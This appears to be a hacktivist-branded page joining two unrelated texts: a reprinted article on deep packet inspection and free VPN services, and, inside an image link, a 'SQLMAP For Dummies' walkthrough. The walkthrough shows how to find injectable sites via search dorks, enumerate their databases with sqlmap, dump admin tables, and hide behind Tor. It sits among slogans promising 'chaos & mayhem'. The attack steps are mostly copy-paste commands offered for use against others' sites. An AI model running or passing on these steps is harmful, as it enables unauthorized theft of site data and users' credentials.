HOW TO USE VPN TO DEFEAT DEEP PACKET INSPECTION
Imagine a technology that can stop spam and malware, identify and block illegal downloads, and allow ISPs to prioritize the data they transmit by content as well as by type. Sounds pretty good.
Now imagine a technology that gives network managers and governments the ability to monitor everything you do on the Internet, including reading and recording your e-mail and other digital communications, and tracking your every move on the Web.
Of course, it’s the same technology—deep packet inspection (DPI) by name. That’s how governments around the world are able to spy on their citizens’ online activities and control their access to the Internet.
ISPs have long been able to record every site you visit and track what you do on those sites. They can and do block access to specific sites.
But only recently has it become practical from a bandwidth and resource perspective for network providers to read all the data in the packets sent from and delivered to their customers’ computers without slowing their networks to a crawl.
North Korea, China, Iran, and other countries routinely use deep packet inspection to block Internet content and keep tabs on their citizens.
The easiest way to cover your Web tracks is to encrypt your data and network connection. The most popular encryption services use a virtual private network(VPN).
Free VPN services come with a price
The free HTTPS Everywhere Firefox add-on from the Electronic Frontier Foundation automatically encrypts connections on sites that support the technology. Unfortunately, not all sites support HTTPS, among other limitations.
A more thorough technique for preventing your Web activities from being recorded is to establish a VPN connection. The Tech Support Alert site rates several free VPN services in its guide to anonymous-surfing products.
Topping the list are CyberGhost VPN, ProXPN, and SecurityKiss.
I tried the free versions of ProXPN and OpenVPN’s Private Tunnel, but the first is too slow (and annoying), and the second gives you only 100MB of data transfers. The paid versions of both products remove these limitations, as you might have guessed.
Quick and simple setup, but painful performance in the free version
It took only a few minutes to install ProXPN and sign up for a free account. Click the red lock icon that appears in the Windows notification area or Mac menu bar to establish an encrypted connection.
Once your VPN connection is established, hover over the green lock icon to view the IP address and other information about the VPN server you’re linking through.
The free version’s slow 100Kbps maximum transfer speed harkens back to the pre-broadband days of dial-up modems. Also, when you open your browser you have to click through an annoying ProXPN “upgrade now” screen to get to your designated home page.
According to the company’s site, the ProXPN Premium service has “no bandwidth restrictions, all available ports are open, PPTP VPN enabled (in addition to our standard OpenVPN), full access to all proXPN servers world-wide, and port selection.” The premium version costs $10 a month or $50 for six months; the company offers a 7-day free trial.
Not much encryption offered by the free version of OpenVPN’s Private Tunnel
Apart from the 100MB data limit, the open-source Private Tunnel service is a breeze to sign up for and use. But most Internet users will burn through the free version’s data-transfer allotment in a couple of days. As with ProXPN, Private Tunnel places an icon on the desktop that you click to establish an encrypted connection.
The service offers 50GB of protected data transfers for $12 a year, 100GB for $20 per year, and 500GB for $50 per year; the company estimates that most people transfer between 50GB and 100GB of data per year.
By comparison, the free version of the OpenVPN-based SecurityKiss service provides up to 300MB of encrypted data transmissions per month for free. An account allowing up to 20GB per month costs $3.97 for one month or $31.71 for one year; while the service’s unlimited plan costs $13.25 for one month or $119.26 for one year. (Three-month and six-month plans with various data limits are also available.)
Many people will respond to the privacy threat posed by deep packet inspection with a big yawn. After all, if you don’t want to be tracked, don’t use the Internet. But privacy advocates such as the Electronic Privacy Information Center and the Electronic Frontier Foundation are unanimous in their opposition to indiscriminate online eavesdropping, whether it’s done by public or private entities. For the time being, it remains possible to keep the trackers at bay. Use it or lose it.
By Anonymous Productions NO©™
Share by #OpHackStorm #OpShitStorm Joint-Venture
Putting toys in the hands of Boys
#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar
☣ I’m a Pirate ☠
I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.
☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢
Long live the ones who dare.
UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
![SQLMAP For Dummies v1.0
Required for use: BackTrack 5 R1
Start your BackTrack 5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.
Now lets get started!
First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:
http://localhost.com/index.php?id=1337’
Notice the ‘ here: ^
This should give you a pretty error and a good start!
Lets open sqlmap!
So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:
python sqlmap.py -u <website>
With a website we would simply do it like this
python sqlmap.py -u http://localhost/index.php?id=1337
(note we did not add the ‘ here)
-u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:
(note the following options use double dashes)
- -dbs to find DataBases
- -users to find users.
python sqlmap.py -u http://localhost/index.php?id=1337 - -dbs (and/or) - -users
(for the sake of lenght we will be assuming you used - -dbs in this tutorial)
After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!
Should look like this:
available databases [2]:
[*] database1
[*] database2
Now to the fun part!
python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1
This tells the program to find tables (- -tables) in database (-D) names: database1.
Once you execute this you will find (maybe) tons of tables. Locate the one you want…lets call it admin!
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
Now you should see the info of the table admin. But now we should be able to dump it! This can be done by - -dump or - -dump-all.
Examples:
python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1 - -dump-all
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin - -dump
- -dump dumps the selected tables content, - -dump-all dumps EVERYTHING!
But, we should be secure?
Tor with SQLMAP:
First find /etc/apt/sources.list open it and add
deb http://deb.torproject.org/torproject.org lucid main
Open the terminal and use this commands:
gpg - -keyserver keys.gnupg.net —recv 886DDD89
gpg - -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
And now we need more commandos ran as root:
apt-get update apt-get install tor tor-geoipdb apt-get install polipo
Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
Go to /etc/polipoconfig and replace the file with the one above. restart polipo: /etc/init.d/polipo restart
Congratz! now you can run sqlmap with TOR!
python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin —dump —tor —random-agent
Happy safe hacking!
By Matrix Productions NO©™
http://www.twitter.com/TheAnonMatrix
Source:
http://www.coresec.org/2011/04/24/sqlmap-with-tor/
https://www.torproject.org/docs/debian.html.en#ubuntu
Share by #OpHackStorm #OpShitStorm Joint-Venture Putting toys in the hands of Boys #Anonymous #H4ck3rz Will Prepare You to Share chaos & mayhem for #LulzWar
☣ I’m a Pirate ☠ I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢ Long live the ones who dare. UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©](http://25.media.tumblr.com/tumblr_lzb5ypxKyj1r9ch8ko1_1280.jpg)
